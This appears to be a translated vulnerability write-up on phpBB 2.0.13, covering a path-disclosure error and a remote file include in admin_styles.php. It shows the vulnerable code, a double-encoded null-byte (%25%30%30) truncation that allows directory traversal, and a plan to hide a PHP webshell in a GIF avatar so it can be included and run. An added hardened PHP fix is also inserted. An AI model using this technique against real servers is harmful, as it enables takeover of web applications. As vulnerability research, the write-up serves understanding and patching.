1. Path Disclosure
Vulnerability file: /db/
Vulnerability description: Directly requesting the directory exposes the web server's filesystem path
Version involved: phpbb <=2.013
Test: requesting http://127.0.0.1/phpBB2/db/ in IE returns an error:
Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\ on line 405
Solution
If you are not using an Oracle database, the file can simply be deleted.
Change the setting: display_errors=Off
2. Remote php File Include
Vulnerability file: /admin/admin_styles.php
Vulnerability description: Variables in admin_styles.php are not strictly filtered, so malicious code can be executed from the admin back-end, compromising the server
Version involved: phpbb <=2.013 + php <5.0
Vulnerability Analysis:
71 case "addnew":
72 $install_to = ( isset($HTTP_GET_VARS[install_to]) ) ? urldecode($HTTP_GET_VARS[install_to]) : $HTTP_POST_VARS[install_to];
73 $style_name = ( isset($HTTP_GET_VARS[style]) ) ? urldecode($HTTP_GET_VARS[style]) : $HTTP_POST_VARS[style];
74
75 if( isset($install_to) )
76 {
77
78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
79
80 $template_name = $install_to;
81 $found = FALSE;
The $install_to variable is not strictly filtered before it is used in include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");, so an intruder can mount an attack by crafting $install_to.
Test analysis (purpose: obtain a webshell from the admin back-end):
First, look only at line 78:
78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
include() ultimately executes theme_info.cfg, which stores the settings of a "style". If we can insert malicious code into theme_info.cfg, it will be executed directly through include :) [See "A little idea from the background to the webshell"] Let's test it:
In the admin panel: Styles management --> Management options --> Edit --> enter ";phpinfo();" in the CSS stylesheet field (other variables can be used as well); the "Output" action then saves it successfully to theme_info.cfg
Open theme_info.cfg to see:
$subSilver[0][head_stylesheet] = "\";phpinfo();\"";
Annoyingly, the " was escaped. I tested this with magic_quotes_gpc = off, so it seems phpBB itself filters it. This path is not viable :(
PHP itself, in versions <5.0 (excluding 4.10), has a null-byte truncation vulnerability:
--------------------------------------------------------------------------------------------------------------------------------
There is an input validation vulnerability in PHP; remote attackers can use it to read system files and perform directory traversal attacks.
The first problem is in addslashes(). addslashes() is used to filter user input: when magic_quotes_gpc is set to "on", addslashes() is applied to every input. However, because NULL bytes are incorrectly encoded by addslashes(), if the user input is then used by include() or require(), an attacker may be able to read any file on the file system.
The second problem is path traversal in uploads. PHP automatically filters the uploaded file name and removes everything before a slash or backslash. However, if the file name uploaded by the attacker contains a single quote, and the web server has magic_quotes set to ON or applies addslashes() to the uploaded file name, a backslash is prefixed to the single quote. On Windows systems this can cause directory traversal, allowing files to be uploaded to any directory on the system.
Warning: main(./../templates/theme_info.cfg\0/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78
Warning: main(): Failed opening ./../templates/theme_info.cfg\0/theme_info.cfg for inclusion (include_path=.;f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7
%00 was turned into \0; phpBB is being a pain here. Since %00 does not work, look at line 72 again:
72 $install_to = ( isset($HTTP_GET_VARS[install_to]) ) ? urldecode($HTTP_GET_VARS[install_to]) : $HTTP_POST_VARS[install_to];
We submit via IE, i.e. by GET. The install_to parameter we submit is then passed through urldecode(), so we can first URL-encode %00 once more as %25%30%30 and submit:
http://127.0.0.1/phpBB2/a......6eb9ea1e43e62cbd634
Returned:
Warning: main(./../templates/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78
Warning: main(): Failed opening ./../templates/theme_info.cfg for inclusion (include_path=.;f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7
Compare with %00:
%00 ---> main(./../templates/theme_info.cfg\0/theme_info.cfg)
%25%30%30 ---> Warning: main(./../templates/theme_info.cfg)
Haha, the include was successfully truncated, so we can use ../ to call arbitrary files :)
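A hardened version of the addnew branch, as an added example that is not phpBB's own code (written in modern PHP, not the PHP 4 the page targets): it drops the second urldecode() that turns %25%30%30 into a NUL byte, and allowlists the template directory name before include(). The function name safe_template_dir and the error messages are assumptions.

```php
<?php
// Added example, not phpBB's code. Hardened replacement for the "addnew"
// branch shown above; assumes $phpbb_root_path is set as in phpBB 2 and
// uses modern PHP syntax (PHP 7+), unlike the PHP 4 code on the page.
//
// Two changes relative to the vulnerable original:
//  1. No urldecode() on request values. PHP decodes the query string once
//     already; decoding a second time is what turns a submitted %25%30%30
//     into %00 and then into a raw NUL byte that truncates the include path.
//  2. $install_to is allowlisted and resolved with realpath() so that
//     "../", NUL bytes and anything outside templates/ are rejected before
//     include() sees the value.

function safe_template_dir(string $root, string $install_to): ?string
{
    // phpBB 2 template directory names are plain identifiers (e.g. subSilver).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $install_to)) {
        return null;
    }
    $base = realpath($root . 'templates');
    $dir  = realpath($root . 'templates/' . $install_to);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    // The canonical path must be a direct child of templates/ (defence in
    // depth: the pattern above already excludes path separators).
    if (dirname($dir) !== $base) {
        return null;
    }
    return $dir;
}

$install_to = $_GET['install_to'] ?? $_POST['install_to'] ?? null;

if ($install_to !== null) {
    $dir = safe_template_dir($phpbb_root_path, $install_to);
    if ($dir === null) {
        // Constructed error text; phpBB would normally call message_die().
        die('Invalid template name.');
    }
    $cfg = $dir . DIRECTORY_SEPARATOR . 'theme_info.cfg';
    if (!is_file($cfg)) {
        die('Template has no theme_info.cfg.');
    }
    include($cfg);
    $template_name = $install_to;
    $found = false;
}
```

With this check in place, both the %00 and the %25%30%30 requests shown above fail the pattern test and never reach include(), and the warning that leaked the install path is no longer produced.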
Specific exploitation
We save the phpshell code into a gif or other image file, upload it through the forum, and then craft install_to so that the file is included and executed.
Here the phpshell code is saved in an image, which we upload at http://127.0.0.1/phpBB2/?mode=editprofile
Returned error: The avatar filetype must be .jpg, .gif or .png
As shown in Figure 1
Everyone knows that image files have their "magic" headers: opening a gif in an editor such as UltraEdit shows "GIF89a" at the start of the file. It seems phpBB also uses getimagesize() or a similar function to check the file after checking the extension. So how can we get around it? Note that there is an empty data area of "0000..." at the end of the gif file, and the php code can be written into that.
As shown in Figure 2